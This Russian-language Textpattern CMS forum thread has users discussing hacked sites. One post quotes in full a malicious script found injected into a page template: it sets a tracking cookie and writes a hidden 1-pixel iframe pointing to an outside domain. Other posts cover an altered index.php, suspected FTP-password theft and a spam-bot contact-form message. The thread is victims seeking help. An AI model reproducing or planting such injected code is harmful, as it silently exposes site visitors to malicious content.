форум общения русскоязычных пользователей CMS Текстпаттерн
Вы не зашли.
Сегодня случайно зашел в диагностику и увидел, что "Некоторые файлы Textpattern были изменены:", а именно файл index.php в корне.
Поглядел в него, а там длиннющая строка со скриптом после основного кода. Файл заменил на оригинальный, сменил пароль на фтп, комп проверил...
К чему все это пишу - полезно было бы (на мой взгляд) результаты предварительной проверки, что в диагностике, выводить где-нибудь в более часто посещаемой и более видимой части админки.
Неактивен
У меня тоже недавно был такой глюк - видимо троянчег крадет пароли от фтп и прописывается во всех index файлах. Советую проверить все файлы по маске index*.* на всех своих хостингах.
А может и *.html туда же.
Неактивен
Сегодня перестал загружаться один из сайтов - в шаблоне страницы (TXP) обнаружил такой код:
<script>function addCookie(szName,szValue,dtDaysExpires){var dtExpires = new Date();var dtExpiryDate = \"\";dtExpires.setTime(dtExpires.getTime()+dtDaysExpires*24*60*60*1000);dtExpiryDate=dtExpires.toGMTString();document.cookie=szName+\"=\"+szValue+\";expires=\"+dtExpiryDate;}function findCookie(szName){var i=0;var nStartPosition=0;var nEndPosition=0;var szCookieString=document.cookie;while(i<=szCookieString.length){nStartPosition=i;nEndPosition=nStartPosition+szName.length;if(szCookieString.substring(nStartPosition,nEndPosition)==szName){nStartPosition=nEndPosition+1;nEndPosition=document.cookie.indexOf(\";\",nStartPosition);if(nEndPosition<nStartPosition)nEndPosition=document.cookie.length;return document.cookie.substring(nStartPosition,nEndPosition);break;}i++;}return \"\";}var szCookieString = document.cookie;if(findCookie(\"ffsesidd\")==\"c48a765e4f75baeb85f0a755fc3ec09c\"){}else{addCookie(\"ffsesidd\",\"c48a765e4f75baeb85f0a755fc3ec09c\",1);document.write(\'<iframe src=\"http://vsv1.co.cc/imgurl.php?hl=d5c7173509a2c384\" name=\"facebook\" scrolling=\"auto\" frameborder=\"no\" align=\"center\" height = \"1px\" width = \"1px\"></iframe>\');}</script>
Каким образом эта гадость попала на сайт и как себя можно обезопасить в будущем?
PS - по поводу своего первого поста нашел плагин smd_prognostics, но я его так и не смог завести
Неактивен
Случайно разбился хрустальный шар - никто не сможет точно сказать удаленно каким образом с вами это случилось. Советую а) обновиться до 4.3.0, б) проверить логи TXP, в) проверить логи хостера
Неактивен
430 - уже давно обновлен. Логи гляну на досуге.. только вот что там конкретно искать-то?
Подозреваю, что изменения были через аминку txp / sql, т.е. не через фтп.
Неактивен
Через форму обратной связи zem contact получил сообщение. Чтобы это значило: кто-то развлекается или пытается найти, как залезть на сайт?
Ваше имя:: hoyavjqh
Ваш e-mail:: awkznf@pcrage.com
Заголовок сообщения:: MaxhhfOobgyW
Ваше сообщение:: rgHNdN <a hr ef="h ttp://ahzmsldhnoks.com/">ahzmsldhnoks</a>, [url=http://g wtzixasgaxi.com/]gwtzixasgaxi[/u rl], [ lin k=http://djrqivleltfy.com/]djrqivleltfy[/ lin k], h ttp://ezfzsxfqjrtf.com/
IP: 193.137.203.231
Browser: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
П.С В добавил пробелы, чтобы абракадабра не отображалась ссылками.
Отредактированно Richard (10-02-2011 14:00:09)
Неактивен
скорее всего это хрумка(или что-то похожее) на полном автомате ищет места для спама...
Неактивен